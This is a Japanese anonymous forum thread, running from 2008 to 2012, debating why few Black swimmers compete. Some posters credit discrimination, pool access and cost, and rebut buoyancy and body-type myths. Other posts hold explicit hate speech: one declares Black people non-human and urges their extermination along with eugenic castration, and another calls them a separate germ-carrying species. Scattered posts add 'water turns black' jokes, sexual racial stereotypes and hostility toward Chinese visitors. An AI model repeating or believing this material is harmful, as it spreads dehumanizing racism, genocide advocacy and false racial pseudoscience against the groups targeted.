「水泳の場合は浮力が必要だから、体脂肪率が低すぎる&骨密度が高すぎる(アメリカの)黒人は不利」
「(アメリカの)黒人は水に沈んでしまうから、体質的に水泳に向いていない」
一見もっともらしいけど、これ、ちょっと考えればおかしい点に気付くよね。
水泳選手に理想的な比重が存在し、理想的な体脂肪率があるとして、(北島は体脂肪率12-13%ぐらいらしいね)
(仮に)アメリカの黒人が白人に比べて体脂肪率が低かったとしても、体脂肪率には男女差があるわけで。

人種に関わらず女性のほうが10%ぐらい体脂肪率が多いわけだから、アメリカの黒人男性が水泳選手に理想的な体脂肪率を維持するのに(仮に)不利だとしても、
その場合は代わりにアメリカの黒人女性が理想的な水泳選手の体脂肪率のレンジに入りやすくなる。
当然の帰結として、アメリカの黒人女性は体質的に水泳競技に向いていることになっちゃう。

事実、>>229-230>>232を読むと、アメリカの黒人女性水泳選手が出てくる日も近いかも。
0257第1のコース!名無しくん垢版2008/08/15(金) 16:00:48ID:3/GYQvHd
そして体脂肪率が低ければ低いほど圧倒的に有利な体操競技で(アメリカの)黒人が目立たない理由にいたっては、どう考えても体質に原因を帰すことは出来ない。
骨密度が高いのも、体操競技に有利に働くことはあっても、不利にはならない。
水泳も体操も同じ理由だろうね、アメリカでは人種的偏見(の名残)と経済性による競技人口の少なさ。アフリカでは施設維持などの経済的な理由が主だろうね。
フィギュアでもボナリーの身体能力は圧倒的だったからな。演技に雑なところがあったのと芸術点が高くなかったので、オリンピックでは金とれなかったけど。
0258■■■■■垢版2008/08/15(金) 16:13:47ID:wGAEUTBx
つまり、黒人は差別的にプールに入れないような時代が長く続き、それが社会的な慣習のようになってしまったまま現在に至る。

ということだろう。それが自然な成り行きだった。

まあ黒人も特にプールで泳ぎたいわけじゃないだろうしな。
0259第1のコース!名無しくん垢版2008/08/15(金) 16:15:30ID:3/GYQvHd
まあアメリカの黒人だって、ブックブクに太った人がゴロゴロいるわけで、体脂肪率や骨密度云々で「黒人は水に沈む」ってのは眉唾だと分かりそうだけどね。
若い年齢でのアスリートに限って体質の有利・不利があるために水泳には向かないという説も、男女の体脂肪率差(浮力差)があるので破綻してるのは>>256の通り。
0261第1のコース!名無しくん垢版2008/08/15(金) 16:50:53ID:oEZ8T43t
黒人スイマーって赤道ギニアの選手ぐらいしか思いつかないw
0262第1のコース!名無しくん垢版2008/08/15(金) 19:12:31ID:B5rDmU7W
>>256
そうそう、黒人といっても1種類じゃないからね。
陸上の話をすると、ケニアやエチオピアといった東アフリカ人は全体的にひょろひょろしてて、
長距離は強いが短距離はダメ。
ナイジェリアあたりの西アフリカ人は比較的ずんぐりしてて、短距離は強いが長距離はダメ。

で、アメリカやカリブ海周辺の黒人は西アフリカからの移民で、多かれ少なかれ白人の血も混じってる。
本来、白人と黒人では白人の方がガタイはいいんだが、アメリカの黒人は白人のガタイと黒人の運動能力を
併せ持った最強のハイブリッドであるわけだ。
0263クーベルタン男爵さん垢版2008/08/15(金) 22:47:25ID:GnVhI3wD
>>8
日本語でおk
0264第1のコース!名無しくん垢版2008/08/16(土) 04:31:46ID:bHeSrZe1
もちろん黒人選手育成の環境が整ってないっていうのが最大の理由だろうな。

ただ昨日の中継で鈴木大地が

黒人選手は足が長い

ケツが下がって足沈む

抵抗が大きい

水泳に不利

って言ってたぞ。
ちなみにフェルプスは白人の割に足が短いから速いらしい。

体脂肪率の話はちょっと当てはまらないんじゃないかな?
たしか8%ぐらいをきると体が沈んでくるんだよねww
0265第1のコース!名無しくん垢版2008/08/16(土) 08:09:13ID:UdmNlFQV
鈴木大地も白人から聞いた話を鵜呑みにしてるんだろうな。
素朴な疑問として黒人選手がいないことを白人水泳選手に尋ねてみても、
「水泳は金がかかるから」とか「差別があったから」とか答えないでしょ。
そもそも泳ぐ技術を習ったことがない人が多く、社会的制約のせいで水泳を楽しむ習慣が一般的でなく、
水泳競技者の人口も少ないアメリカの黒人について、体型の影響がどうこう言っても意味無い。
日本人がセパタクローで強くない理由を、一生懸命体型やら体質で説明しても滑稽でしょ。
単に「競技者人口が少ない」、この大前提があるから。
日本国中セパタクローやって、それでも勝てないのであれば、そこで初めて体型の話が出てくる。
0267第1のコース!名無しくん垢版2008/08/17(日) 23:51:24ID:KhDsmV8D
ムサンバニ
0268第1のコース!名無しくん垢版2008/08/18(月) 07:18:26ID:khJR8BGh
陸上の短距離のように
将来は水泳も黒人だらけの世界になるんじゃないの!
黒人の身体能力の高さに圧倒され 白人が及ばなくなり水泳やらなくなるようになり今と立場が逆転して白人の選手が珍しくなり!なぜ白人がいないの?というレス立ちそう
0269メモ用垢版2008/08/18(月) 08:53:21ID:TDn2RUX0
17. Posted by ジェンさんへ、男性特有の問題への理解のため 2008年08月15日 03:34
ジェンさん
自分は在日アイルランド系アメリカ人女性と婚約中の者ですが、
彼女の話によればアメリカではペニスのサイズによって交際できる女性の美的レベルに違いが生じるとの事でした。
しかしそれは特定の集団の中で相対的に、という意味でなければならず、ただ大きければ大きいほどよい、
という考えをもった男性はえてして女性から敬遠されがちなはずです。
彼女の話によれば自分のそれはミディアムサイズだそうですが、
これはアングロサクソン系アメリカ人男性と比較しても特に引けをとらない、という意味でもあるそうです。
ペニスのサイズの相違について人種的見地からの偏見が生じ、アジア系の男性が被害者意識を持ち、
アフリカ系の男性がプレッシャーに晒される傾向にあることをジェンさんはご存じでしょうか?
初期のアメリカにおいて白人と黒人のトイレやプールが分けられたのは黒人が自分たちよりビッグなペニスを持っているかもしれない、
という妄執に苦しんだ白人男性のとった措置ではなかったのでしょうか。
さらに、白人女性が主体的な意思に基づいて黒人男性と性的交渉を持った場合でさえ、それに気付いた周囲の白人男性が黒人男性のペニスを切断する事例も相次ぎました。
黒人が街に来ると白人は郊外へと退避する、という現象からも居住空間、ひいては対人関係に人種問題が及ぼす影響が確認されます。
ジェンさんの見解を伺いたく思います
0270第1のコース!名無しくん垢版2008/08/19(火) 14:19:10ID:JsIX9+ya
プールは無くとも海はあるだろ
歴史的に泳げない泳がない人種なんでは?差別関係なく
0271第1のコース!名無しくん垢版2008/08/19(火) 14:34:46ID:TQQ0QiT1
既に出てたらすみませんが、アメリカのカレン・ジョーンズは黒人です。
記録もなかなかのものを持っていたはずです。
自分が見たのは半フリでしたけど。
0272第1のコース!名無しくん垢版2008/08/19(火) 18:51:37ID:BICB+4nU
>>270
・海や川で競泳の練習は無理
・アメリカでは黒人がビーチで遊ぶような立場にない時代が長かった
・親世代が泳げないと、子供を連れて海水浴に行って泳ぎを教えることもできない
・アメリカには社会的に子供全体に水泳を教える仕組みがない(小学校にプールがない)

プールがないと競技としての水泳は成立しない
海があり、泳ぐ習慣もあり、気候的に泳げる期間が長く、人種差別による制約もない東南アジアの水泳選手を、
国際大会でどれだけ見たことがあるか考えてみよう
日本・中国にトップスイマーがいるので、黄色人種が体格的・体質的・人種的に不利ということもない

アメリカでは、プールはあっても社会的障壁(経済的障壁・人種的偏見)のために、黒人には手が届かなかった
0273第1のコース!名無しくん垢版2008/08/19(火) 18:55:07ID:BICB+4nU
もちろんアフリカの多くの国では、施設としてプールを作ることも、飲めるぐらいきれいな水を無駄遣いすることも、経済的に無理
アフリカでも海岸線近くや川の近くに住んでる人は泳ぐが、それが競技水泳には結びつかないことは上に述べたとおり
0274第1のコース!名無しくん垢版2008/08/19(火) 19:16:42ID:w4Mu5BVS
日本の小学校にはプールがあるけど、あんなもの夏の一時期に水にはいるだけで、競泳の練習には全く不十分だよな。

あれ、消火用に水を貯めておく役割も兼ねているんだろうか。
0275第1のコース!名無しくん垢版2008/08/19(火) 19:21:19ID:BICB+4nU
>>274
小学校にあるような屋外プールだけで競泳選手になるのは無理
とはいえ、泳げる人間が多いと言うのは、裾野を広げることにはなってる
才能がありそうだから、本格的にスイミングクラブに行ってみようかって気にもなる
0276第1のコース!名無しくん垢版2008/08/19(火) 22:32:09ID:aSvpd85X
やはり人種差別の弊害なんだろうな。
それと、水泳は手っ取り早くカネになるスポーツじゃないしな。
多くの黒人が手っ取り早く稼げるスポーツに流れるのは仕方ない。
一握りのトップアスリートだけが稼げる競泳より、アメフトや野球やバスケットに向かうのは当然だろう。
0277第1のコース!名無しくん垢版2008/08/20(水) 09:53:55ID:fdjSwmNR
陸で黒人に勝てないから、水に逃げ込んでるようにも見えるw
0278第1のコース!名無しくん垢版2008/08/20(水) 19:46:40ID:/Wg7Nr9K
人種差別は絶対あってはならない。
0279垢版2008/08/20(水) 21:17:46ID:BwSax8AP
水が黒くなるから
0281第1のコース!名無しくん垢版2008/08/20(水) 21:46:46ID:/Wg7Nr9K
実際、黒くもならないし黄ばんだりもしない。
白い人が温泉に入っても温泉の色が変ったなど聞いた事ないな

人種差別絶対反対!
0283第1のコース!名無しくん垢版2008/08/21(木) 05:39:29ID:dcioNwTm
黒人は体質的に浮きにくいだの骨格が筋肉がうんぬん
適当なでっちあげ言って黒人を意図的にプールから遠ざけてきたのが原因だが、
問題はそういう理由を白人、黄人、そして黒人でさえも信じ込んでしまい
差別と貧困問題が隠れてしまっていることだな。
そしてほくそ笑んでいるのは今現在の水泳界の秩序でおいしい思いをしていて
これからもおいしい思いをしたい奴らだな。
0284可愛そうだ垢版2008/08/21(木) 09:23:56ID:g4+XkdfD
黒人を差別するべきなんだ、人種差別が何故悪い、どこが悪い、黒人を西洋人は昔は
見世物として世界中に連れて行った、世界中で動物と同じように扱った、其れがどこが悪い。
黒人が人類であると言い切れるか、人類とは、ある程度の文明を背負ってるものだ、
我々人類は進化を逆戻りするわけには行かない、黒人は、人類とは連続性が無い、
いいか猿、と類猿人とはどこが違うか。類人猿と人類、これら三つは遺伝子的には99%以上同じだ。
ハイギョから地上に上がった哺乳類というが、今のハイギョからまた同じような進化がありうるか
今のニホンザルから人類が得られるか、この答えはあり得ない、つまり黒人から
われわれ人類が誕生しない、と結論が起こるからだ。
黒人はそういう意味で人類ではないし、差別すべきなのだ、
人類のこのすばらしい進化は何故起こったかそれはタユマナイ支配だ、それは要らない人種を
自ら絶滅させたからである、人類は自然淘汰ではなく人為淘汰していたのだ、
悪い遺伝子は、一族郎党ひっとらえ獄門台に送ってたのだ、しかも気違い、だの片輪モノ
異常性格、などは優性遺伝で去勢した、もう一度それらを復活させるべきだ。
そして黒人を世界中からそろそろ駆除すべきときが来てる。
0287第1のコース!名無しくん垢版2008/08/22(金) 11:20:31ID:jROO3xDL
こと黒人の問題についていえば、日本人って部外者だからね。
当事者になっても同じことが言えるかどうかは別のお話。
0292第1のコース!名無しくん垢版2008/09/30(火) 08:21:23ID:LU70tGLf
>>257
体操は単に四肢の長い(傾向にある)黒人には向いてないからでしょ。
0293第1のコース!名無しくん垢版2008/09/30(火) 17:51:24ID:Fxrdriug
>>284
長々とご苦労な事だが、たった一言いわせてもらうと人類発祥の地はどこだったかな?
と問いたい
0294ほろい垢版2008/09/30(火) 22:46:02ID:pR1FOUvD
人類発祥の地は未だ確定してるわけじゃないぞ、僅かの遺体だけで結論が出せるような事じゃない、
しかもだ。骨が平均に出るわけじゃない、例えば東南アジアでは3年で人間の骨も土中では溶ける
日本でも100年で溶ける、つまり1万年前の人骨となれば収集場所は非常に限られる、まして100万年前では
話にならない、まほろばでも出てこないんだから。
0295第1のコース!名無しくん垢版2008/09/30(火) 23:21:34ID:Fxrdriug
人類発祥の地はアフリカだと言われている
具体的な場所は忘れたが、アフリカ起源説が通説となっている
0296第1のコース!名無しくん垢版2008/10/01(水) 05:23:02ID:s+947P05
>>295
ただし、人類学者にとって大きな謎
ある地層から骨が出たがその次に見つかった地層は遥か時代を経過してから
あるべきはずのその間の骨が一切見つかっていない、遺伝学的にもつながらない
種の保存に必要な絶対的個体数から言ってもありえないほどの少なさ
果たしてアフリカかどうか、それが人類の祖先か猿の変異種か誰も確信がもてない

と言うことで人間の起源は取り残された宇宙人にしてしまえ....
0298マラソンマラソンマラ損損垢版2008/10/02(木) 01:29:25ID:MbWbnHN2
金の亡者サムエル・ワンジル水の中で溺れ逝去か
0299第1のコース!名無しくん垢版2008/10/02(木) 11:27:41ID:pT5oYFQz
身体能力考えたら短距離なら黒人最強ぽいけどなぁ。
金持ちになるためにスポーツしてそうなイメージがある、だから水泳なんかしないんじゃない?

儲けのでかいメジャーなスポーツを選ぶんじゃないの?
0300第1のコース!名無しくん垢版2008/10/04(土) 15:45:47ID:r9AOtFy9
黒人富裕層はスポーツなんて遊び程度にしかやらんしな
必死な貧困層は金になるスポーツしかやらん
極端だな黒人は
0301第1のコース!名無しくん垢版2008/10/13(月) 10:49:53ID:Q5QtWI13
>>292
間違い。たった一行の中にこれだけ間違いが詰め込まれてる文章も珍しい。
まず、手足の長いロシアは体操が強い。
そして手足の長さは体操の強さと無関係。手足の長いロシアも強いし手足の短い中国、日本も強い。
さらに黒人が手足が長いというのも間違い。「黒人」を一括りにして同じ身体傾向にするのは間違いだと上でも散々指摘されてる。
アメリカの黒人に限れば同じ身体傾向があるとしても、アメリカの黒人はアメリカの白人に比べて手足が長いわけではない。

あと、人類のアフリカ単一起源説が現在ほぼ定説になっているのは、化石人骨だけではなく、むしろ分子時計による研究が決め手。
0302第1のコース!名無しくん垢版2008/10/17(金) 03:48:35ID:o/CH4e9p
アフリカって、川はワニがいるし湖には寄生虫。
海はサメがいっぱいで泳ぐとこないんじゃね?
プールだと泳げる奴が限られるよな…
0303第1のコース!名無しくん垢版2008/10/19(日) 19:43:45ID:pguNYI2K
手足の長い黒人独特のあの体格にあった技術が確立していないのだろう。
つまり水泳の技術を教える者がいない。教えられる者がいない。

陸上で言えば、黒人の走りを日本人が真似しても速く走れないよな。
0304第1のコース!名無しくん垢版2008/10/19(日) 23:32:11ID:r0mFSUKP
>手足の長さは体操の強さと無関係

器械体操は手足長いと普通に不利。
慣性モーメントが大きくなり重心も不安定になるから。
体操のトップに180cm以上はほとんどいない。
0305第1のコース!名無しくん垢版2008/10/21(火) 13:30:08ID:tSUrHS31
黒人は遺伝的に筋肉質だから水泳はむいてないんじゃ
0306第1のコース!名無しくん垢版2008/10/21(火) 17:53:25ID:vxJMFVTe
単に人種差別じゃないのか?水が汚れるとか・・・
昔は音楽もブラックコンテンポラリーとかいってランキングも
分けられてたし
0308第1のコース!名無しくん垢版2008/10/22(水) 04:42:41ID:ZFViLmwB
>>304
それは手足の長さじゃなくて身長でしょうが。
上で言われてる体操における「手足の長さ」ってのは、全部比率の話だよね。
そして手足の長さの比率が大きいロシア人その他スラブ系体操選手(特に女子選手)が一貫して強いのはどう説明するのかと。

>>305
「水泳に向いてない理由が筋肉質云々」説は根強い人気だけど、破綻してるから。>>256をどうぞ。
0309第1のコース!名無しくん垢版2008/10/22(水) 12:57:47ID:hyIap6tV
>>308
身長と手足の長さは密接に関係してるだろw
体格に対して手足が長いと言っても絶対的な長さ自体は大した事無い。
手足の長さが体操と関係無いとか言うのは言い過ぎだろう。
0310第1のコース!名無しくん垢版2008/10/22(水) 16:47:12ID:+d8AjdX3
おもしろいくらい必死だな。
0311第1のコース!名無しくん垢版2008/10/22(水) 16:59:44ID:UpUyoiNA
そのうち、いっぱい出てくるって!!以上
0313第1のコース!名無しくん垢版2008/10/29(水) 01:53:16ID:hbIkrHtV
アメリカは公立中学・高校にプールがない場合が多いから
水泳を習うには金を払ってスイミングクラブに行かなきゃいけないからだって
最近の新聞に書いてあった。
0314第1のコース!名無しくん垢版2008/10/29(水) 12:49:34ID:r24aHjO+
プールは費用がかかるし
そんなに人気があるわけでもないから、黒人の選手はほとんどいないんじゃ
0315第1のコース!名無しくん垢版2008/10/29(水) 22:48:52ID:XmJWg6tG
水泳も一応プロがあるけど、アメフトやバスケに比べて金にならないから、元から水泳選手になりたい奴が少ないんじゃね?
0316第1のコース!名無しくん垢版2008/10/30(木) 21:41:53ID:WMlMV+oM
日本の小中学校でプールがほぼ義務化されてるのは
大昔船の事故で生徒が溺れ死んだので安全に習えるようにプールが増えたとか聞いたことある
0318第1のコース!名無しくん垢版2008/12/30(火) 22:41:28ID:NoEeZwWG
「黒人は泳げない」という通説の背景にある事情
ttp://news.ohmynews.co.jp/news/20070720/13324
0319第1のコース!名無しくん垢版2009/01/01(木) 07:17:24ID:pXhKmjZU
>>318
てっきり、差別から来てると思ってた
まだまだ俗説で教科書に載らない説だが
人間が水の中で生きた猿だった、という進化論と人類はアフリカから発祥という説明もあるから、
不思議だね。

0320第1のコース!名無しくん垢版2009/01/03(土) 22:55:21ID:RV5r+GX2
差別なぁ・・・


自分の通ってるプールにビジターの中国人がきて、
ウォーキングでもない所で、あのデカい声で騒いでるの聞いて殺意が沸いた。

「こんな所にまで来やがったのか、こいつら」

て本気で思ってしまった・・・・なんだかなあ
0321第1のコース!名無しくん垢版2009/01/06(火) 13:15:42ID:C1+1vdME
外人さんはたとえ家族でも人の浸かった風呂とか気持ち悪がって入らない
プールもにたようなものなのかも
0322第1のコース!名無しくん垢版2009/04/11(土) 13:35:33ID:lgcyzXfM
>>1
水が真っ黒になるから
0323第1のコース!名無しくん垢版2009/04/13(月) 11:56:32ID:+2GQMg0P
>>322
泳いでいいのは透明人間だけか?
0324第1のコース!名無しくん垢版2009/04/13(月) 12:23:58ID:ERtiBgSN
陰茎がでかすぎて抵抗になるから。
下向きに巻き付けても、肛門を通り越して尾てい骨まで届いてしまう。
0325黒人は別の種垢版2009/04/14(火) 00:28:39ID:PVTh8teK
黒人は文化がない。黒人には風呂に入るとかシャワーを浴びるとか手を洗うとか
そういう環境がない、人間的にも悪い黒人がプールに入るということは我々にとって
非常に危険だ、エイズばかりではない、黒人は非常に悪い菌を保有している。
コドモドラゴンというオオトカゲが居るが唾液が非常に毒性が強く我々文明人がちょっと噛まれた
だけで死んでしまうが黒人は平気だ、こいつらには同じような毒物を発生する菌が唾液に含まれてる
非常に危険だ、黒人は我々人類とは別種の生命体であることはもう殆どの最先端学文をしているものなら
常識だ、遺伝子で生物は分けられる、ハエとアブの差、毒蛇と毒蛇でない蛇のさも遺伝子だ。
黒人と我々の差は歴然としてる、あのトカゲのような皮膚と色を見れば遺伝子が完璧に違うことは火を見るより
明らかだ。
0326第1のコース!名無しくん垢版2009/07/24(金) 06:46:58ID:8zH3oKKp
米国:東部で黒人、プールから閉め出しか 人権委に調査申し立て
ttp://mainichi.jp/select/world/news/20090713dde007030027000c.html?inb=yt
◇なくならない差別
 【ニューヨーク小倉孝保】米東部ペンシルベニア州の民間水泳プールで、
黒人の子どもたちが人種を理由に利用を拒否されていた疑惑が浮上し、
同州は10日までに、人種差別を禁じる州法に違反している
可能性があるとして調査することを決めた。地元メディアの報道によると、
フィラデルフィア郊外の「バレイ・スイミング・クラブ」
で6月29日、このクラブを借りている地元の水泳教室に
参加した黒人の子どもたちが、居合わせた人から「黒人の子どもがここで何をしているのよ」
「自分の子どもに何かあったら怖い」といった趣旨の発言を聞いたという。
子どもたちから訴えを受けた水泳教室がクラブに抗議したところ、
クラブ側はプールの利用契約金1950ドル(約18万5000円)
を小切手で返還したという。このため、水泳教室側は
人種を理由にプールの利用を拒否されたと判断。親の一人が
州人権委員会に調査を申し立てた。
人権委員会のグラスマン委員長は9日、「州法はあらゆる者の
機会の平等を保障している。訴え通りなら違法な差別だ」との声明を発表した。
クラブ側は人種差別を否定し、利用拒否の理由を「利用者が多くなり過ぎたため」と説明している。

【関連記事】
米国:黒人差別?プール利用の拒否疑惑 ペンシルベニア州
ttp://mainichi.jp/select/world/europe/news/20090713k0000e030031000c.html


0327第1のコース!名無しくん垢版2009/07/25(土) 20:35:15ID:j20/1eu/
大分前だけどCNNで、どっかの州のプライベートな会員制のプールが黒人のガキを拒否したら
訴えられて、入場拒否は人種差別と判断されて拒否されたガキどもが嬉しそうにそのプールで
泳いでた光景をニュースで流してたことがあったな
0328うるさい垢版2009/07/25(土) 21:02:44ID:+Jz8tpla
黒人は熱帯で何千年と生活してきた、骨格は緻密で筋肉は硬く強靭である
我々のようにぶよぶよしてないのだ、筋肉が強くても早く泳げない、練習で速く
泳げるようになる。しかも現代の水泳競技は走るような先天的に早い者がいないのだ。
その上あるレベルから上は専門教育が必要である、日本のように日本中にスイミングスクール
がある国が強い。黒人は浮力と泳法技術の2つで劣ってると言うことである。
その代わり陸上で非常に強いから良いではないか。
スケートなんぞやらせればこれも強いであろう。水泳以外これほど向いてる人種は発見されてない。
後50年もすれば殆どのスポーツのプロは黒人ばかりになる。
0329tpg垢版2009/07/30(木) 16:02:49ID:L+sJzoFd
黒人はデカすぎて、パンツにおさまりません。また視力が5.0のため、かすかな乳首の突起が見られます。ヤバいです。
0330第1のコース!名無しくん垢版2009/07/30(木) 18:15:14ID:fDWoK5Zo
黒人でも湖のほとりに住んでいる部族なんかだと先祖代々泳いできたんじゃないのかな?
0331jmw垢版2009/08/04(火) 19:31:25ID:yJPBCvg3
黒人のティンポはでかい。オリンピックの選手村では、コンドームを大量に用意するとか。黒人サイズはありません。よって、オリンピックが終わって帰国したら、黒人が生まれるなんて…。
0332第1のコース!名無しくん垢版2009/10/08(木) 22:09:15ID:Zg7ibGrs
泳ぎまくってたら水泳に適した骨密度になるかも
0333第1のコース!名無しくん垢版2009/10/21(水) 20:50:02ID:pCuOPyUE
>>299
確かに。
0334第1のコース!名無しくん垢版2009/10/21(水) 20:57:49ID:Uz9qGEH6
水泳で選手になったて金になんないからな
目指すはプロスポーツ選手
そこから落第した奴がオリンピック選手
0335第1のコース!名無しくん垢版2009/10/22(木) 22:20:30ID:6l11+RVl
NBA NFL MLB NHL
0336第1のコース!名無しくん垢版2009/10/22(木) 22:31:04ID:NswVVso0
一目瞭然
向いてない
ttp://www.mizuno.co.jp/card/report/no011/images/no11_5.jpg
0337第1のコース!名無しくん垢版2009/10/23(金) 09:17:14ID:UmbUKDoq
いや、筋繊維の比率だけが理由なら、
マラソンや長距離走の強いエチオピアやケニアが水泳も強いはず。
環境や文化の影響が大きい。
0338第1のコース!名無しくん垢版2009/10/23(金) 20:26:47ID:HH1s60qm
ボルトのような素質を持った人が子供のときから本格的に練習したら
普通の水着でも100M45秒台で泳げるようになるかも。
0339第1のコース!名無しくん垢版2009/10/24(土) 06:11:20ID:s34oYLKo
アフリカの人が言ってたけど
アフリカにはワニとか川に居るから泳げないってさ
プールもないみたいさ
0340第1のコース!名無しくん垢版2009/10/24(土) 06:16:33ID:s34oYLKo
あと、南米の人が言ってたけど
川や湖にカンジルっていう尻の穴や女性器から侵入するドジョウがいるから
泳げへんって言ってたな ピラニアよりこわいらしい。
0341第1のコース!名無しくん垢版2009/10/24(土) 20:58:31ID:vZcUX0m+
エロドジョウ!
エロ同人に出てくる「触手」みたいなやつが本当にいたとは・・・
0342第1のコース!名無しくん垢版2009/10/26(月) 20:12:36ID:v1tp4tdb
中身が空っぽの鉄パイプは「浮く」のに対し中身が詰まった
鉄パイプは「沈んでしまう」ことを考えると
骨密度が低い人は浮きやすく競泳に向いているのに対し
骨密度の高い人は浮きにくく競泳に向いていないかも
0343第1のコース!名無しくん垢版2009/10/26(月) 20:28:12ID:WeLztwWx
ちんこが長く太く、勃起すると異常にでかくなるから
黒人は少ない
0344第1のコース!名無しくん垢版2009/10/27(火) 22:22:16ID:GrHE3OP7
競泳よりはシンクロの方がかっこいいかも。
0345第1のコース!名無しくん垢版2010/05/03(月) 13:57:56ID:IB/KJ4ek
黒人の人は体が立派すぎて近くで休憩すると自分が貧相に思える。
0346第1のコース!名無しくん垢版2010/05/09(日) 00:35:44ID:b9UXrPpv
骨が強いと水中では活かしにくいのかも
0347第1のコース!名無しくん垢版2010/05/09(日) 23:37:52ID:uUQdLups
米国の黒人はリレーにいつも出ている。
単に遅いだけやろ。
黒人にも色々いるからな。
混血が強いのは当たり前じゃ。

0349第1のコース!名無しくん垢版2010/06/07(月) 01:59:31ID:se07Lu3N
>>346
だろうね。
三点リーダーの使い所もおかしいし。
高校でレポートとか小論文ぐらい書かされなかったのかな。
学校で習わなくてもビジネス文書の書き方は入社時に叩き込まれるはずなんだが。
0350第一のコース!名無しくん垢版2010/06/07(月) 23:13:45ID:5fizFXYP
やはり人種差別だと思います。公営プールが少なく、そのため専ら白人が練習する環境
になっていることによると思います。また同じ水の中で泳ぐことが自体が白人にとって
嫌われているのが真実ではないでしょうか。身体的構造は理由にならないと思います。
0351第1のコース!名無しくん垢版2010/11/22(月) 00:35:55ID:RlWzi1Uy
>>342
なるほど
>>345
確かに
0353第1のコース!名無しくん垢版2010/11/26(金) 12:55:46ID:UMzF+pWj
>>352
地域人口の比率よりは少なめ。海水淡水問わず,実際水に入らずにパーティ気分で騒いでるのはいっぱいいる。

実際、40年間アメリカ各地で競泳してるが黒人差別はないよ。まあミシシッピの田舎の個人経営プールとかは知らないけどね.

まあ、いままで何度も出てるけど筋肉重すぎ、水泳じゃ金にならない,環境的にプール行かない、だと思う。だってNBA選手になれば数十億儲かるのに水泳なんかやらせないよ、周りが。
金メダル取ったって、末路は精々が四年に一度のオリンピックの解説員か、水泳コーチだもんな。
0355第1のコース!名無しくん垢版2011/03/04(金) 00:26:15.87ID:0tDzAU4p
ビルダー体型の人って日本人レベルでも水泳やってるのあまり見ない
0356第1のコース!名無しくん垢版2011/03/04(金) 00:40:58.35ID:bUCc8Nnc
だって浮かねーもん
筋肉を不用意につけて速くなるなら皆そうするしな
0357第1のコース!名無しくん垢版2011/03/04(金) 00:51:44.99ID:0tDzAU4p
やはりそうなのですか
バサロなんかやったら中々浮いてこず苦しさとの戦いになるのでしょうね
0359第1のコース!名無しくん垢版2011/06/03(金) 12:49:51.74ID:rsdiw9xm
アフリカ系の人が人種的に優位な身体的部位は下半身だろ?
あの長い脚や骨盤形体やケツの筋肉とか。

アフリカ系の人は身長2メートルくらいある人でも
上半身はアジア人の160センチくらいの
骨格とかいっぱいいる

推進力の中心が上半身の水泳には身体的優位ないんじゃないの

アメリカはともかくヨーロッパに人種差別なんぞほとんどない
特にフランスでパリのシャトレにある長水路で差別とか絶対ありえない
でもアフリカ系の人は全く泳いでないけどね

メダルとったスリナム人はオランダ育ちなんだろうね
0360第1のコース!名無しくん垢版2011/07/13(水) 21:00:54.58ID:r2OSqL8H
そういうことなんや・・・。

黒い液が染み出てくるから、っていう理由もあったりするんかなあ?
うちが前テレビで聞いたことあったンはそれやったから・・・。

人権作文書きなおさなあかんかも(笑)w
0361第1のコース!名無しくん垢版2011/07/18(月) 00:52:25.08ID:Pu6xGJqv
>>340
>川や湖にカンジルっていう尻の穴や女性器から侵入するドジョウがいる

違うよ
アンモニアや尿素に激しく反応するから川の中でションベンした人の尿道に侵入する
だから被害者はほとんど男
ちなみにどじょうのエラには抜け落ち防止のとげが付いてるから一度侵入されたら自力では引っこ抜けないらしい
0362第1のコース!名無しくん垢版2012/03/17(土) 19:55:53.00ID:xyoB8EHJ
予選を通過してないから黒人の水泳選手が少ないんじゃないの?
テレビで放映されるような大会の予選をね
0363第1のコース!名無しくん垢版2012/03/18(日) 13:35:25.28ID:8TWYWCUQ
貧しいっていっても貧乏な国は物価も安いんだぞ。
だからその国に施設があるなら近くにあるなら普通に通える。
日本の貧乏人と一緒だよ。無理すれば通える。

アメリカやヨーロッパの黒人もそれぐらいの金ぐらいあるよ。
政治家や麻薬やスポーツやギャングで黒人がこれだけのさばってるんだぞ。
それに貧乏すぎるやつは食料支給で食事代は浮かせられる。

俺はたんに黒人文化のなかにスポーツがないから、人気がないからだと思うよ。
0364第1のコース!名無しくん垢版2012/03/18(日) 14:27:01.81ID:Z0eN7M0i
実際プール施設の維持費コストにいくらくらいかかってるのか知らない人が多そうだな

日本では戦後の国の政策(スポーツ振興法)のおかげで
今じゃどこにでもごく当たり前に学校のプールとかいろんな公営プールがある

年金政策はボロボロで支離滅裂で既に手遅れだけど
国内の公営プール施設を良く利用している人たちは
国や自治体にありがとうと言っていいと思うよ
0365第1のコース!名無しくん垢版2012/07/02(月) 11:18:42.49ID:3i4nLjff
アメリカの男子50m自由形は
カレン・ジョーンズとアンソニー・アービンの黒人2人がロンドン五輪代表に決定
0366第1のコース!名無しくん垢版2012/07/04(水) 18:25:45.43ID:63L7xo2g
高校の時に水泳やってたけど、水泳でつけた筋肉は陸上での応用性があんまりない
水の中では早く動けないし、つけた筋肉も空気中ではスピードが足りない
対して黒人の筋肉は瞬発力に旨味があるからじゃないかな
0367第1のコース!名無しくん垢版2012/07/07(土) 21:28:48.27ID:KapFL+Ui
ジンジン人生  GJ in GSW+小α北方人種(Hr)

831の誓いABC(P)

83年〜2009年 最高期
87年〜2003年 安定最高期
89年2001年  文化大成期
89年〜93年  文化大成期 成長期
94年〜98年  文化大成期 華期 96年〜97年(97年)黄金期
99年〜2001年 文化大成期 終盤期


0368第1のコース!名無しくん垢版2012/07/08(日) 17:57:26.78ID:cfynQ8Zl

手っ取り早い陸上や実績のあるバスケ、ベースボールの方が金になる。
0370第1のコース!名無しくん垢版2012/07/10(火) 02:30:14.39ID:0JEFZbqJ
陸上の速い奴ほど水泳も速い。
身体能力とセンスのある奴は何やっても上手。


0371第1のコース!名無しくん垢版2012/07/21(土) 18:26:17.24ID:A5JkuECI

得意げに潜水・息堪えについて語ってる珍しい黒人シンクロ選手。
そして自慢するかのようにプールで潜泳する彼女。
 
  http://www.youtube.com/watch?v=nXS72cNd0ng

でも彼女知ってるのかな? 潜水競技の女子世界記録が160mということを ・・・・
さて、この潜水自慢な黒人シンクロ選手を
長さ160mの水中トンネル内の潜り抜けで、この世界記録に挑戦させたらどうなるかな? 
もちろん、途中で息継ぎ無しの出口まで無呼吸な条件でねw
0372第1のコース!名無しくん垢版2012/07/21(土) 19:31:11.02ID:FFT/KIRz
>>371
日本語がなかなか上手だし、
最後の2行に書いてるような発想とてもユニークだね。
日本人の俺にはそんな事、逆立ちしても思いつかないよ。
先ずは自分でやってみれば?
